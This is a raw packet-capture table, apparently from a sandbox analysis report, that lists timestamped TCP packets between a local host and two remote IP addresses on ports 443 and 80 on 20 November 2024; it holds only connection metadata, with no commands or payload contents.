                                                                                                            Nov 20, 2024 16:58:11.775506020 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.779278994 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.779366016 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.779385090 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.782387972 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.782473087 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.782489061 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865583897 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865606070 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865621090 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865686893 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.865690947 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865704060 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865719080 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865735054 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.865757942 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.865830898 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865847111 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865852118 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865864992 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865900040 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.934158087 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.934267044 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.934298992 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937359095 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937372923 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937391996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937422991 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.937443018 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937491894 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.941113949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.941126108 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.941153049 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.941176891 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.941191912 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.944261074 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.944272995 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.944293976 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.944325924 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.944340944 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.948030949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.948044062 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.948065042 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.948100090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.948128939 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.951036930 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.951047897 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.951105118 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.951122046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.954338074 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.954353094 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.954411030 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.954426050 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.958066940 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.958080053 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.958146095 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.958159924 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961077929 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961122990 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961158991 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.961173058 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961224079 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.964894056 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.964920044 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.964979887 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.964992046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.968044043 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.968107939 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.968120098 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.971590996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.971648932 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.971662045 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.974602938 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.974670887 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.974683046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.977819920 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.977878094 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.977890968 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.981623888 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.981683016 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.981694937 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.984805107 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.984880924 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.984893084 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.985171080 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.985193968 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.985224962 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.989571095 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.989656925 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.055335999 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.055464029 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.055603027 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.059382915 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.059515953 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.059585094 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.066176891 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.066359043 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.066489935 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.074723005 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.075460911 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.075527906 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.082609892 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.083009958 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.083079100 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.091088057 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.091232061 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.091305971 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.099562883 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.099968910 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.100039005 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.107777119 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.107896090 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.107964993 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.116450071 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.116837978 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.116929054 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.124500036 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.124907017 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.124984980 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.135396957 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.135433912 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.135503054 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.138585091 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.138694048 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.138725996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.142529964 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.142563105 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.444408894 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.447112083 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.447926044 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.447995901 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.450004101 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.450220108 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.450280905 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.452755928 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.452912092 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.452972889 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.455491066 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.455745935 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.455811977 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.458246946 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.458338022 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.458400011 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.460961103 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.461585999 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.461648941 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.463584900 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.463696957 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.463757038 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.466375113 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.466638088 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.466696024 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.469100952 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.469228983 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.469290018 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.471262932 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.471364021 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.471417904 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.473843098 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.474212885 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.474267960 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.476572037 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.477149963 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.477209091 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.478977919 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.479430914 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.479485989 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.481539011 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.481700897 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.481750965 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.484102011 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.484122038 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.484164953 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.486768961 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.488012075 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.488070965 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.489222050 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.489322901 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.489371061 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.491858959 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.492002010 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.492055893 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.494602919 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.495044947 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.495105028 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.496965885 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.497114897 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.497517109 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.499485016 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.499974012 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.500030041 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.502073050 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.502232075 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.502289057 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.504637957 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.504792929 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.504849911 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.507180929 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.507816076 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.507977009 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.547739983 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.547871113 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.547904015 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.548849106 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.548897028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.548917055 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.548921108 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.548938036 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.548945904 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.548995018 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.549006939 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.551614046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.551635981 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.551659107 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.551681995 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.551700115 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.551711082 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.706492901 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706506014 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706511021 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706548929 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706553936 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706583977 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706595898 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706613064 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706614971 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.706619024 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706644058 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706651926 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.706655979 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706657887 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.706669092 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.706691027 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706696987 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.706701040 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706722975 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706753969 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706759930 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.706768036 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706788063 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706794024 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.706839085 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.706940889 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706950903 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706969976 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706978083 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.706980944 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.706988096 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707027912 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707097054 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707103968 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707108974 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707130909 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707149029 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707155943 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707163095 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707173109 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.707257986 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707283974 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707303047 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707323074 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707323074 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.707340002 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707340956 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707355976 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707360983 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707426071 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707513094 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707545996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707551003 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707556009 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.707595110 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707607031 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707612038 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707726955 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707762003 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707771063 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.707834005 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707864046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.707882881 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.707902908 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.707910061 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.708051920 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.708101034 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.708106041 CET44349174142.215.209.78192.168.2.22
Nov 20, 2024 16:58:12.708159924 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708200932 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.708205938 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708292961 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708331108 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.708338022 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708458900 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708504915 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.708509922 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708642960 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708645105 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708682060 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708690882 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.708697081 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.708719015 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708733082 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.708784103 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708817005 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708827972 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.708856106 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708889961 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708908081 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.708939075 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708975077 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.708991051 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709012985 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709062099 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709064960 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709099054 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709136963 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709150076 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709171057 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709219933 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709222078 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709254026 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709292889 CET  80  49175  192.3.220.29  192.168.2.22
